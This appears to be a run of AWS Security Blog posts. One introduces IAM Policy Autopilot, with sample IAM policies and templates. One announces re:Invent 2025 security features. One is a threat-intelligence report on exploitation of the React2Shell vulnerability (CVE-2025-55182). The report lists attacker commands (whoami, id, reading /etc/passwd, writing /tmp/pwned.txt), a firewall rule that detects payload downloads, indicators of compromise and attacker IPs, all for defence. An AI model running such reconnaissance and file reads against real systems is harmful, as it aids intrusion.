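# ['kms:GenerateDataKey', 's3:PutObject']
```

The point of the table-driven approach is determinism: the same code always yields the same actions, with no model inference involved.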

Access denied troubleshooting

After permissions are created, if you still encounter Access Denied errors during testing, IAM Policy Autopilot detects these errors and provides instant troubleshooting. When enabled, the AI coding assistant invokes IAM Policy Autopilot to analyze the denial and propose targeted IAM policy fixes. After you review and approve the analysis and suggested changes, IAM Policy Autopilot updates the permissions.

MCP and CLI support

IAM Policy Autopilot operates in two modes to fit different development workflows. As an MCP server, it integrates with MCP-compatible coding assistants, including Kiro, Amazon Q Developer, Cursor, Cline, and Claude Code. You can also use IAM Policy Autopilot as a standalone CLI tool to generate policies directly or fix missing permissions. Both approaches provide the same policy creation and troubleshooting capabilities, so you can choose the integration that best fits your workflow.

Demonstrating IAM Policy Autopilot capabilities

This walkthrough demonstrates the MCP server capabilities of IAM Policy Autopilot through a practical example: creating a file upload application that stores documents in Amazon S3 with server-side encryption using a customer-managed KMS key. This demonstration uses Cline, though IAM Policy Autopilot works with any MCP-compatible coding assistant.

Prerequisites and setup

You can install IAM Policy Autopilot using uv or pip. The simplest method is uv: run uvx iam-policy-autopilot, then configure the MCP server in your MCP client configuration file as follows. Note that the MCP configuration differs if you install IAM Policy Autopilot using pip.

{
  "mcpServers": {
    "iam-policy-autopilot": {
      "command": "uvx",
      "args": ["iam-policy-autopilot", "mcp-server"],
      "env": {
        "AWS_PROFILE": "your-profile-name",
        "AWS_REGION": "us-east-1"
      },
      "disabled": false,
      "autoApprove": []
    }
  }
}

Creating a secure file upload Lambda function

In this section, we walk you through creating an application from scratch. We demonstrate the interaction between the developer, Cline, and IAM Policy Autopilot to showcase how you provide guidance to Cline and how Cline invokes IAM Policy Autopilot behind the scenes to generate IAM policies and deploy your application.

1. The builder describes their requirements
User: I need to create a Lambda function for uploading files to S3. The files should be encrypted using a customer-managed KMS key. Can you help me build this?

2. Cline starts planning the solution
Cline: I’ll help you create a secure file upload Lambda function. Let me break this down:

  1. Create a Lambda function to handle file uploads
  2. Set up S3 integration with customer-managed KMS encryption
  3. Create the necessary IAM permissions
  4. Build the infrastructure using CDK
    Let me start by writing the Lambda function code.

3. Cline writes the AWS Lambda function code
Cline will also prompt for the deployment inputs it needs, such as the partition, AWS Region, and AWS account ID.

Cline then creates the uploadHandler.js file:

const { S3Client, PutObjectCommand } = require('@aws-sdk/client-s3');

const s3Client = new S3Client({ region: 'us-west-2' });

exports.handler = async (event) => {
	const { fileName, fileContent } = JSON.parse(event.body);

	const putObjectParams = {
		Bucket: process.env.BUCKET_NAME,
		Key: fileName,
		Body: fileContent,
		ServerSideEncryption: 'aws:kms',
		SSEKMSKeyId: process.env.KMS_KEY_ID
	};

	try {
		await s3Client.send(new PutObjectCommand(putObjectParams));
		return {
			statusCode: 200,
			body: JSON.stringify({ message: 'File uploaded successfully' })
		};
	} catch (error) {
		return {
			statusCode: 500,
			body: JSON.stringify({ error: error.message })
		};
	}
};

4. Cline needs to create IAM policies and will discover IAM Policy Autopilot
Cline: Now I need to create the IAM role with the correct permissions for this Lambda function. Let me check what tools are available to help with IAM policy creation.

Cline discovers the IAM Policy Autopilot MCP server has policy creation capabilities and invokes it:

Request Type: CallToolRequest
	Method: CallToolRequestMethod
	Params:
		Name: "generate_application_policies"
		Arguments:
			account: "123456789012"
			partition: "aws"
			region: "us-west-2"
			source_files: [
				"/Users/user/workspace/uploadHandler.js"
			]
		Extensions: Extensions

5. IAM Policy Autopilot analyzes the code and generates the policy
IAM Policy Autopilot scans the code and identifies PutObjectCommand in the application code, which it recognizes as an Amazon S3 API call. Based on typical usage patterns of AWS customers, IAM Policy Autopilot also suggests encryption permissions and CloudWatch Logs permissions.

IAM Policy Autopilot generates an IAM identity policy that includes permissions potentially needed for Amazon S3 PutObject, including AWS KMS permissions that might be required for encryption scenarios:

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Effect": "Allow",
			"Action": [
				"s3:PutObject"
			],
			"Resource": "arn:aws:s3:::*/*"
		},
		{
			"Effect": "Allow",
			"Action": [
				"kms:Encrypt",
				"kms:GenerateDataKey"
			],
			"Resource": "arn:aws:kms:us-west-2:123456789012:key/*"
		},
		{
			"Effect": "Allow",
			"Action": [
				"logs:CreateLogGroup",
				"logs:CreateLogStream",
				"logs:PutLogEvents"
			],
			"Resource": "arn:aws:logs:us-west-2:123456789012:*"
		}
	]
}

6. Cline creates the complete CloudFormation infrastructure
Cline: Perfect! IAM Policy Autopilot generated comprehensive permissions for your Lambda function including S3 PutObject permissions, KMS permissions for potential encryption scenarios, and CloudWatch Logs permissions for function execution. I’ll now create the complete CloudFormation template.

Cline generates the AWS CloudFormation template with the permissions provided by IAM Policy Autopilot:

AWSTemplateFormatVersion: "2010-09-09"
Resources:
  UploadEncryptionKey:
    Type: AWS::KMS::Key
    Properties:
      KeyPolicy:
        Statement:
          - Effect: Allow
            Principal:
              AWS: !Sub "arn:aws:iam::123456789012:root"
            Action: "kms:*"
            Resource: "*"

  SecureUploadBucket:
    Type: AWS::S3::Bucket

  UploadLambdaRole:
    Type: AWS::IAM::Role
    Properties:
      AssumeRolePolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Principal:
              Service: lambda.amazonaws.com
            Action: sts:AssumeRole
      Policies:
        - PolicyName: UploadPolicy
          PolicyDocument:
            Version: "2012-10-17"
            Statement:
              - Effect: Allow
                Action:
                  - s3:PutObject
                Resource: !Sub "${SecureUploadBucket.Arn}/*"
              - Effect: Allow
                Action:
                  - kms:Encrypt
                  - kms:GenerateDataKey
                Resource: !GetAtt UploadEncryptionKey.Arn
              - Effect: Allow
                Action:
                  - logs:CreateLogGroup
                  - logs:CreateLogStream
                  - logs:PutLogEvents
                Resource: "arn:aws:logs:*:*:*"

  UploadHandler:
    Type: AWS::Lambda::Function
    Properties:
      Runtime: nodejs18.x
      Handler: uploadHandler.handler
      Code:
        ZipFile: |
          // Lambda function code would be deployed separately
      Role: !GetAtt UploadLambdaRole.Arn
      Environment:
        Variables:
          BUCKET_NAME: !Ref SecureUploadBucket
          KMS_KEY_ID: !Ref UploadEncryptionKey

This demonstrates how IAM Policy Autopilot seamlessly integrates into the development workflow, providing the coding assistant with current and accurate IAM configurations when invoked, while requiring minimum user intervention.

In this example, you’re passing a single file to IAM Policy Autopilot to analyze, but it can take in multiple files when conducting static code analysis and creating IAM policies.

Direct CLI use: Simplified policy creation

If you prefer direct command-line interaction, the CLI provides the same analysis capabilities without requiring an AI coding assistant.

1. Builder has existing code and needs policies
In this example, you have the same uploadHandler.js file and want to generate identity-based IAM policies for deployment:
$ iam-policy-autopilot generate-policy --region us-west-2 --account 123456789012 --pretty /Users/user/workspace/uploadHandler.js

2. IAM Policy Autopilot analyzes and outputs the policy

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Effect": "Allow",
			"Action": [
				"s3:PutObject"
			],
			"Resource": "arn:aws:s3:::*/*"
		},
		{
			"Effect": "Allow",
			"Action": [
				"kms:Encrypt",
				"kms:GenerateDataKey"
			],
			"Resource": "arn:aws:kms:us-west-2:123456789012:key/*"
		},
		{
			"Effect": "Allow",
			"Action": [
				"logs:CreateLogGroup",
				"logs:CreateLogStream",
				"logs:PutLogEvents"
			],
			"Resource": "arn:aws:logs:us-west-2:123456789012:*"
		}
	]
}

3. Builder uses the generated policy
You can now copy this policy directly into your CloudFormation template, AWS Cloud Development Kit (AWS CDK) stack, or Terraform configuration.

This CLI approach provides the same code analysis and cross-service permission detection as the MCP server but fits naturally into command-line workflows and automated deployment pipelines.

Best practices and considerations

When using IAM Policy Autopilot in your development workflow, following these practices will help you maximize its benefits while maintaining a strong security posture.

Start with IAM Policy Autopilot-generated policies, then refine

IAM Policy Autopilot generates policies that prioritize functionality over minimal permissions, helping your applications run successfully from the first deployment. These policies provide a starting point that you can refine as your application matures. Review the generated policies so that they align with your security requirements before deploying them.

Understand the IAM Policy Autopilot analysis scope

IAM Policy Autopilot excels at identifying direct AWS SDK calls in your code, providing comprehensive policy coverage for most development scenarios, but has some limitations to keep in mind. For example, if your code calls s3.getObject(bucketName) where bucketName is determined at runtime, IAM Policy Autopilot currently doesn’t predict which bucket will be accessed. For applications using third-party libraries that wrap AWS SDKs, you might need to supplement the analysis produced by IAM Policy Autopilot with manual policy review. Currently, IAM Policy Autopilot focuses on identity-based policies for IAM roles and users but does not create resource-based policies such as S3 bucket policies or KMS key policies.
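Because runtime-determined resources can't be predicted by static analysis, the generated policy typically uses a wildcard resource that you narrow by hand once you know the actual bucket. The following sketch (function and policy shapes are illustrative, not part of IAM Policy Autopilot) shows that manual refinement step:

```python
import copy

def narrow_s3_resource(policy, bucket_name):
    """Return a copy of the policy with wildcard S3 object resources
    narrowed to a specific bucket's objects."""
    refined = copy.deepcopy(policy)
    for stmt in refined["Statement"]:
        if stmt.get("Resource") == "arn:aws:s3:::*/*":
            stmt["Resource"] = f"arn:aws:s3:::{bucket_name}/*"
    return refined

# A statement shaped like the generated policy shown earlier in this post.
generated = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:PutObject"], "Resource": "arn:aws:s3:::*/*"}
    ],
}

refined = narrow_s3_resource(generated, "secure-upload-bucket")
print(refined["Statement"][0]["Resource"])
# arn:aws:s3:::secure-upload-bucket/*
```

Working on a deep copy keeps the original generated policy intact, so you can diff the broad and refined versions during review.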

Integrate with existing IAM workflows

IAM Policy Autopilot works best as part of a comprehensive IAM strategy. Use IAM Policy Autopilot to generate functional policies quickly, then use other AWS tools for ongoing refinement. For example, AWS IAM Access Analyzer can help identify unused permissions over time. This combination creates a workflow from rapid deployment to least-privilege optimization.

Understand the boundary between IAM Policy Autopilot and your coding assistant

IAM Policy Autopilot generates policies with specific actions based on deterministic analysis of your code. When you use the MCP server integration, your AI coding assistant receives this policy and might modify it when creating infrastructure-as-code templates. For example, you might see the assistant add specific resource Amazon Resource Names (ARNs) or include KMS key IDs based on additional context from your code. These changes come from your coding assistant’s interpretation of your broader code context, not from the static analysis provided by IAM Policy Autopilot. Always review content generated by your coding assistant before deployment to verify that it meets your security requirements.

Choose the right integration approach

Use the MCP server integration when working with AI coding assistants for seamless policy creation during development conversations. The CLI tool works well for batch processing or when you prefer direct command-line interaction. Both approaches provide the same analysis capabilities, so choose based on your development workflow preferences.

Conclusion

IAM Policy Autopilot transforms IAM policy management from a development challenge into an automated capability that works seamlessly within existing workflows. By using the deterministic code analysis and policy creation capabilities of IAM Policy Autopilot, builders can focus on creating applications knowing they have the necessary permissions to run successfully on AWS.

Whether you prefer working with AI coding assistants through the MCP server integration or using the direct CLI approach, IAM Policy Autopilot provides the same analysis capabilities. The tool identifies common cross-service dependencies such as S3 operations with AWS KMS encryption, generates syntactically correct policies, and stays current with the expanding catalog of services provided by AWS, reducing the burden on both builders and their AI assistants.

Rather than requiring builders to become IAM experts or struggle with cryptic permission errors, IAM Policy Autopilot makes AWS development more accessible and efficient. The result is faster deployment cycles, fewer permission-related failures, and more time spent on creating business value instead of debugging access issues.

Ready to reduce IAM friction in your development workflow? IAM Policy Autopilot is available now at no additional cost. Get started with IAM Policy Autopilot by downloading it from the GitHub repository and experience how automated policy creation can accelerate your AWS development. We welcome your feedback and contributions as we continue to expand the capabilities and coverage of IAM Policy Autopilot.

If you have feedback about this post, submit comments in the Comments section below.

Diana Yin

Diana Yin

Diana is a Senior Product Manager for AWS IAM Access Analyzer. Diana focuses on solving problems at the intersection of customer insights, product strategy, and technology. Outside of work, Diana paints natural landscapes in watercolor and enjoys water activities. She holds an MBA from the University of Michigan and a Master of Education from Harvard University.

Luke Kennedy

Luke Kennedy

Luke is a Principal Software Development Engineer with AWS Identity and Access Management (IAM). Luke joined the IAM organization in 2013 after graduating from Rose-Hulman Institute of Technology with a degree in Computer Science and Software Engineering. Outside of AWS, Luke enjoys spending time with his cats, overcomplicating his home lab and network, and pursuing all things pumpkin flavored.

AWS launches AI-enhanced security innovations at re:Invent 2025

8 December 2025 at 19:41

At re:Invent 2025, AWS unveiled its latest AI- and automation-enabled innovations to strengthen cloud security for customers to grow their business. Organizations are likely to increase security spending from $213 billion in 2025 to $377 billion by 2028 as they adopt generative AI. This 77% increase highlights the importance organizations place on securing their AI investments as they expand their digital footprints.

AWS uses artificial intelligence, machine learning, and automation to help you secure your environments proactively. These advancements include AI security agents, machine-learning and automation-driven threat detection, and agent-centric identity and access management. Together, they unify defense-in-depth across the application, infrastructure, network, and data layers to protect organizations from a wide spectrum of threats, vulnerabilities, and misconfigurations that could disrupt business operations.

AI security agents

AWS is embedding AI agents directly into security workflows to perform code reviews, collate incident response signals, and secure agentic access.

  • AWS Security Agent is a frontier agent that proactively secures applications throughout the development lifecycle. It conducts automated security reviews tailored to organizational requirements and delivers context-aware penetration testing on demand. By continuously validating security from design to deployment, it helps prevent vulnerabilities early in development.
  • AWS Security Incident Response delivers agentic AI-powered investigation capabilities designed to help enhance and accelerate security event response and recovery.
  • AgentCore Identity now offers authentication that provides enhanced access controls for AI agents, which restricts their interactions to authorized services and data based on specific user permissions and attributes. Enabling granular boundaries for how AI agents interact with enterprise applications reduces the risk of unauthorized access or data exposure.

ML and automation-driven threat detection

Machine learning models and automation now accelerate threat detection across more AWS environments, surfacing otherwise hard to see correlations, such as for sophisticated multistage attacks, at scale. These latest advancements save time by automatically correlating signals into consolidated sequences.

Agent-centric identity and access management

Intelligent access controls are redefining how organizations manage identities and permissions. These controls automate policy generation and improve your zero trust maturity level, making it easier for you to use AWS services.

  • IAM policy autopilot helps AI coding assistants quickly create baseline IAM policies that teams can refine as the application evolves, so organizations can build faster.
  • Outbound identity federation helps IAM customers securely federate their AWS identities to external services, making it easier to authenticate AWS workloads with cloud providers, SaaS platforms, and self-hosted applications.
  • Private access sign-in routes 100% of console traffic through VPC endpoints instead of public internet, using intelligent routing to maintain security without compromising performance.
  • Login for AWS local development lets developers use their existing console credentials to programmatically access AWS.

Transforming security through AI

These AI and ML advancements transform security from reactive manual processes to proactive, scalable protection. You can use them to operationalize threat hunting and advance your security posture, even as you grow your digital real estate.

The confidence organizations place in cloud-native security validates this approach. The AWS-sponsored survey of 2,800 IT and security decision makers and practitioners revealed that 81% agree that their primary cloud provider’s native security and compliance capabilities exceed what their team could deliver independently. Additionally, 56% responded that the public cloud was better positioned to deliver security as opposed to 37% that selected on-premises, and 51% believe the public cloud is better positioned to meet regulations versus 41% that responded on-premises.

Cloud is the foundation on which customers build their businesses, and AWS continues to deliver security innovations that reinforce that foundation.

If you have feedback about this post, submit comments in the Comments section below.

Lise Feng

Lise Feng

Lise is a Seattle-based PR Manager focused on AWS security services and customers. Outside of work, she enjoys cooking and watching most contact sports.

China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)

5 December 2025 at 01:18

December 29, 2025: The blog post was updated to add options for AWS Network Firewall.

December 12, 2025: The blog post was updated to clarify when customers need to update their ReactJS version.

Within hours of the public disclosure of CVE-2025-55182 (React2Shell) on December 3, 2025, Amazon threat intelligence teams observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda. This critical vulnerability in React Server Components has a maximum Common Vulnerability Scoring System (CVSS) score of 10.0 and affects React versions 19.x and Next.js versions 15.x and 16.x when using App Router. While this vulnerability doesn’t affect AWS services, we are sharing this threat intelligence to help customers running React or Next.js applications in their own environments take immediate action.

China continues to be the most prolific source of state-sponsored cyber threat activity, with threat actors routinely operationalizing public exploits within hours or days of disclosure. Through monitoring in our AWS MadPot honeypot infrastructure, Amazon threat intelligence teams have identified both known groups and previously untracked threat clusters attempting to exploit CVE-2025-55182. AWS has deployed multiple layers of automated protection through Sonaris active defense, AWS WAF managed rules (AWSManagedRulesKnownBadInputsRuleSet version 1.24 or higher), and perimeter security controls. However, these protections aren’t substitutes for patching. Regardless of whether customers are using a fully managed AWS service, if customers are running an affected version of React or Next.js in their environments, they should update to the latest patched versions immediately. Customers running React or Next.js in their own environments (Amazon Elastic Compute Cloud (Amazon EC2), containers, and so on) must update vulnerable applications immediately.

Understanding CVE-2025-55182 (React2Shell)

Discovered by Lachlan Davidson and disclosed to the React Team on November 29, 2025, CVE-2025-55182 is an unsafe deserialization vulnerability in React Server Components. The vulnerability was named React2Shell by security researchers.

Key facts:

  • CVSS score: 10.0 (Maximum severity)
  • Attack vector: Unauthenticated remote code execution
  • Affected components: React Server components in React 19.x and Next.js 15.x/16.x with App Router
  • Critical detail: Applications are vulnerable even if they don’t explicitly use server functions, as long as they support React Server Components

The vulnerability was responsibly disclosed by Vercel to Meta and major cloud providers, including AWS, enabling coordinated patching and protection deployment prior to the public disclosure of the vulnerability.

Who is exploiting CVE-2025-55182?

Our analysis of exploitation attempts in AWS MadPot honeypot infrastructure has identified exploitation activity from IP addresses and infrastructure historically linked to known China state-nexus threat actors. Because of shared anonymization infrastructure among Chinese threat groups, definitive attribution is challenging:

  • Infrastructure associated with Earth Lamia: Earth Lamia is a China-nexus cyber threat actor known for exploiting web application vulnerabilities to target organizations across Latin America, the Middle East, and Southeast Asia. The group has historically targeted sectors across financial services, logistics, retail, IT companies, universities, and government organizations.
  • Infrastructure associated with Jackpot Panda: Jackpot Panda is a China-nexus cyber threat actor primarily targeting entities in East and Southeast Asia. The activity likely aligns to collection priorities pertaining to domestic security and corruption concerns.
  • Shared anonymization infrastructure: Large-scale anonymization networks have become a defining characteristic of Chinese cyber operations, enabling reconnaissance, exploitation, and command-and-control activities while obscuring attribution. These networks are used by multiple threat groups simultaneously, making it difficult to attribute specific activities to individual actors.

This is in addition to many other unattributed threat groups that share commonality with Chinese-nexus cyber threat activity. The majority of observed autonomous system numbers (ASNs) for unattributed activity are associated with Chinese infrastructure, further confirming that most exploitation activity originates from that region. The speed at which these groups operationalized public proof-of-concept (PoC) exploits underscores a critical reality: when PoCs hit the internet, sophisticated threat actors are quick to weaponize them.

Exploitation tools and techniques

Threat actors are using both automated scanning tools and individual PoC exploits. Some observed automated tools have capabilities to deter detection such as user agent randomization. These groups aren’t limiting their activities to CVE-2025-55182. Amazon threat intelligence teams observed them simultaneously exploiting other recent N-day vulnerabilities, including CVE-2025-1338. This demonstrates a systematic approach: threat actors monitor for new vulnerability disclosures, rapidly integrate public exploits into their scanning infrastructure, and conduct broad campaigns across multiple Common Vulnerabilities and Exposures (CVEs) simultaneously to maximize their chances of finding vulnerable targets.

The reality of public PoCs: Quantity over quality

A notable observation from our investigation is that many threat actors are attempting to use public PoCs that don’t actually work in real-world scenarios. The GitHub security community has identified multiple PoCs that demonstrate fundamental misunderstandings of the vulnerability:

  • Some of the example exploitable applications explicitly register dangerous modules (fs, child_process, vm) in the server manifest, which is something real applications should never do.
  • Several repositories contain code that would remain vulnerable even after patching to safe versions.

Despite the technical inadequacy of many public PoCs, threat actors are still attempting to use them. This demonstrates several important patterns:

  • Speed over accuracy: Threat actors prioritize rapid operationalization over thorough testing, attempting to exploit targets with any available tool.
  • Volume-based approach: By scanning broadly with multiple PoCs (even non-functional ones), actors hope to find the small percentage of vulnerable configurations.
  • Low barrier to entry: The availability of public exploits, even flawed ones, enables less sophisticated actors to participate in exploitation campaigns.
  • Noise generation: Failed exploitation attempts create significant noise in logs, potentially masking more sophisticated attacks.

Persistent and methodical attack patterns

Analysis of data from MadPot reveals the persistent nature of these exploitation attempts. In one notable example, an unattributed threat cluster associated with IP address 183[.]6.80.214 spent nearly an hour (from 2:30:17 AM to 3:22:48 AM UTC on December 4, 2025) systematically troubleshooting exploitation attempts:

  • 116 total requests across 52 minutes
  • Attempted multiple exploit payloads
  • Tried executing Linux commands (whoami, id)
  • Attempted file writes to /tmp/pwned.txt
  • Tried to read /etc/passwd

This behavior demonstrates that threat actors aren’t just running automated scans, but are actively debugging and refining their exploitation techniques against live targets.

How AWS helps protect customers

AWS deployed multiple layers of protection to help safeguard customers:

  • Sonaris Active Defense

    Our Sonaris threat intelligence system automatically detected and restricted malicious scanning attempts targeting this vulnerability. Sonaris analyzes over 200 billion events per minute and integrates threat intelligence from our MadPot honeypot network to identify and block exploitation attempts in real time.

  • MadPot Intelligence

    Our global honeypot system provided early detection of exploitation attempts, enabling rapid response and threat analysis.

  • AWS WAF Managed Rules

    The default version (1.24 or higher) of the AWS WAF AWSManagedRulesKnownBadInputsRuleSet now includes updated rules for CVE-2025-55182, providing automatic protection for customers using AWS WAF with managed rule sets.

  • AWS Network Firewall Rule Options

    Managed

    The Active Threat Defense managed rules for AWS Network Firewall are automatically updated with the latest threat intelligence from MadPot so customers can get proactive protection for their VPCs.

    Custom

    The following AWS Network Firewall custom L7 stateful rule blocks HTTP connections made directly to IP addresses on non-standard ports (any port other than 80). This pattern has been commonly observed by Amazon Threat Intelligence in post-exploitation scenarios where malware downloads additional payloads or establishes command-and-control communications by connecting directly to IP addresses rather than domain names, often on high-numbered ports to evade detection.

    While not necessarily specific to React2Shell, many React2Shell exploits include this behavior, which is usually anomalous in most production environments. You can choose to block and log these requests or simply alert on them so you can investigate systems that are triggering the rule to determine whether they have been affected.

    reject http $HOME_NET any -> any !80 (http.host; content:"."; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/"; msg:"Direct to IP HTTP on non-standard port (common post exploitation malware download technique)"; flow:to_server; sid:2025121801;)

  • Amazon Threat Intelligence

    Amazon threat intelligence teams are actively investigating CVE-2025-55182 exploitation attempts to protect AWS infrastructure. If we identify signs that your infrastructure has been compromised, we will notify you through AWS Support. However, application-layer vulnerabilities are difficult to detect comprehensively from network telemetry alone. Do not wait for notification from AWS.
    Important: These protections are not substitutes for patching. Customers running React or Next.js in their own environments (EC2, containers, etc.) must update vulnerable applications immediately.

Immediate recommended actions

  1. Update vulnerable React/Next.js applications. See the AWS Security Bulletin (https://aws.amazon.com/security/security-bulletins/AWS-2025-030/) for affected and patched versions.
  2. Deploy the custom AWS WAF rule as interim protection (rule provided in the security bulletin).
  3. Review application and web server logs for suspicious activity.
  4. Look for POST requests with next-action or rsc-action-id headers.
  5. Check for unexpected process execution or file modifications on application servers.

If you believe your application may have been compromised, open an AWS Support case immediately for assistance with incident response.
Note: Customers using managed AWS services are not affected and require no action.

Indicators of compromise

Network indicators

  • HTTP POST requests to application endpoints with next-action or rsc-action-id headers
  • Request bodies containing $@ patterns
  • Request bodies containing "status":"resolved_model" patterns
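The network indicators above can be checked with a short log-triage sketch. This is a hypothetical example, not an official AWS tool; the field names assume an already-parsed log record:

```python
import re

# Header names and body patterns taken from the indicator list above
SUSPICIOUS_HEADERS = {"next-action", "rsc-action-id"}
BODY_PATTERNS = [re.compile(r"\$@"), re.compile(r'"status"\s*:\s*"resolved_model"')]

def matches_indicators(method: str, headers: dict, body: str) -> bool:
    """Return True when a parsed request matches any network indicator."""
    if method != "POST":
        return False
    header_hit = any(h.lower() in SUSPICIOUS_HEADERS for h in headers)
    body_hit = any(p.search(body) for p in BODY_PATTERNS)
    return header_hit or body_hit

print(matches_indicators("POST", {"Next-Action": "abc123"}, "{}"))    # header indicator
print(matches_indicators("POST", {}, '{"status":"resolved_model"}'))  # body indicator
print(matches_indicators("GET", {"next-action": "x"}, ""))            # non-POST ignored
```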

Host-based indicators

  • Unexpected execution of reconnaissance commands (whoami, id, uname)
  • Attempts to read /etc/passwd
  • Suspicious file writes to /tmp/ directory (for example, pwned.txt)
  • New processes spawned by Node.js/React application processes
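One way to hunt for the last host-based indicator is to look for recon commands whose parent is a Node.js process. The sketch below is illustrative: the snapshot format and sample data are assumptions, and a real snapshot could be gathered with a command such as `ps -eo pid,ppid,comm`:

```python
# Commands from the indicator list above, plus common shells
RECON = {"whoami", "id", "uname", "sh", "bash"}

def flag_node_children(procs):
    """Given (pid, ppid, command) tuples, flag recon commands parented by node."""
    by_pid = {pid: comm for pid, ppid, comm in procs}
    return [
        (pid, comm)
        for pid, ppid, comm in procs
        if comm in RECON and by_pid.get(ppid) == "node"
    ]

snapshot = [
    (100, 1, "node"),
    (101, 100, "whoami"),   # recon command spawned by node -> flag
    (102, 1, "bash"),       # shell owned by init -> ignore
]
print(flag_node_children(snapshot))
```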

Threat actor infrastructure

IP Address        Date of Activity   Attribution
206[.]237.3.150   2025-12-04         Earth Lamia
45[.]77.33.136    2025-12-04         Jackpot Panda
143[.]198.92.82   2025-12-04         Anonymization Network
183[.]6.80.214    2025-12-04         Unattributed threat cluster
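The IP addresses above are defanged with `[.]` so they are not treated as live links. Before comparing them against connection logs they must be refanged; a minimal sketch (function names are illustrative):

```python
# Defanged indicators, copied from the table above
DEFANGED = [
    "206[.]237.3.150",
    "45[.]77.33.136",
    "143[.]198.92.82",
    "183[.]6.80.214",
]

def refang(ip: str) -> str:
    """Convert a defanged address like 1[.]2.3.4 back to 1.2.3.4."""
    return ip.replace("[.]", ".")

IOC_IPS = {refang(ip) for ip in DEFANGED}

def seen_ioc(remote_addr: str) -> bool:
    return remote_addr in IOC_IPS

print(seen_ioc("45.77.33.136"))   # one of the listed addresses
print(seen_ioc("192.0.2.10"))     # unrelated address
```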

Additional resources

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

CJ Moses

CJ Moses is the CISO of Amazon Integrated Security. In his role, CJ leads security engineering and operations across Amazon. His mission is to enable Amazon businesses by making the benefits of security the path of least resistance. CJ joined Amazon in December 2007 and has held various roles, including Consumer CISO and, most recently, AWS CISO, before becoming CISO of Amazon Integrated Security in September 2023.

Prior to joining Amazon, CJ led the technical analysis of computer and network intrusion efforts at the Federal Bureau of Investigation’s Cyber Division. CJ also served as a Special Agent with the Air Force Office of Special Investigations (AFOSI). CJ led several computer intrusion investigations seen as foundational to the security industry today.

CJ holds degrees in Computer Science and Criminal Justice, and is an active SRO GT America GT2 race car driver.
